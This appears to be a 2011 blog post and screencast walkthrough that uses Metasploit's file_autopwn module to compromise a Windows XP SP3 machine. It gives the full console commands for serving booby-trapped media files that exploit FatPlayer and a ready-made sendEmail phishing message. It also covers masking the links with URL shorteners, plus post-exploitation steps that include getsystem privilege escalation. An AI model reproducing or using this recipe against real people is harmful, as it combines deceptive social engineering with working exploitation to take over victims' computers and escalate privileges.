Owning Windows (XP SP3 vs. Metasploit's File_autopwn)

This screencast demonstrates metasploits ability to automatically generate vulnerable files which are read by a certain application to create an exploit.

After choosing a file to use, the attacker sends a email to the target with a masked URL to the vulnerable file and a link to the application, which is the "correct" version of it too!

Other examples of metasploits "autopwn" features: db_autopwn and browser_pwn

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Owning_Windows-XP_SP3_Vs._file_autopwn.mp4

Tools

  • Metasploit – (Can be found on BackTrack 4-R2). Download here
  • SendEmail SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
  • URL shorter service – (Can be found by using an Internet search engine).

Method

  • Start network services and obtain an IP address
  • Start metasploit and configure file_autopwn
  • Wait for web server to be active
  • Browse available files and view information of that particular one.
  • Discover homepage and download information
  • Create masked URLs
  • Socially engineer an email to the target with all the information
  • Wait for target to download the file and load it in the program
  • Game Over

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
start-network
dhclient eth0
clear

msfconsole
search autopwn
use server/file_autopwn
show options
set LHOST 192.168.0.33
set SRVPORT 80
set URIPATH /
#set SSL true
#set ExitOnSession false
show options
#show advanced
#set CREATEFILES false
run

Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer

search fatplayer
info windows/fileformat/fatplayer_wav

Firefox -> http://www.shorturl.com -> http://192.168.0.33/windows_fileformat_videolan_tivo_msf.ty
Firefox -> Google -> FatPlayer -> Files -> Fat Player -> Fat Player 0.6b -> FatPlayer_06b_Win32.exe   # http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download

sendEmail -f "Attacker <[email protected]>" -t [email protected] -u "You've gonna listen to this" -m "O.M.G.
CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL].

You'll need to grab this ([URL]) to listen to it." -s [smtp host] -xu [smtp user] -xp [smtp pass]

#IE -> Email provider -> [email protected]:******************* -> Download FatPlayer -> Install/Extract -> Click exploit link

sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuid

Walkthrough

The attacker approaches this attack differently by attacking an desktop application that is installed on the operating system (OS) by using a local exploit in a "file type" vulnerability.

To start things, the attacker starts metasploit and locates the file_autopwn module. After examining the required information, the attacker proceeds by entering all the details which are needed. Once this has been done, the attacker sets metasploit to work by creating a mass of vulnerable files after which have been created metasploit set ups a web server which is the going to be used for the delivery method.

The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.

The attacker needs to make sure that they send a vulnerable version of the program to the target however, so they check to see what information is given about the file exploit.

The attacker chooses to socially engineer the target by sending them a email with a link to the file setup and a brief description. To help increase success, the attacker masks the URL of both files by using URL shortening services. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".

The attacker just has to simply wait to see if the target "falls for it" and runs the exploit file... which the target does. =)

Notes

  • You will need to find/use your own SMTP details.
  • You can use any number of URL shortening services.
  • You could of used any files generated by metasploit.
  • You could of attach the file instead of linking in the email (See here for an example), however alot of email services now have anti-virus checking built in...

Song: Sidney Samson (featuring Wizard Sleeve) - Riverside (Lets Go!) (Warren Clarke Remix)

Video length: 6:00

Capture length: 18:11

Blog Post: https://blog.g0tmi1k.com/2011/03/owning-windows-xp-sp3-vs/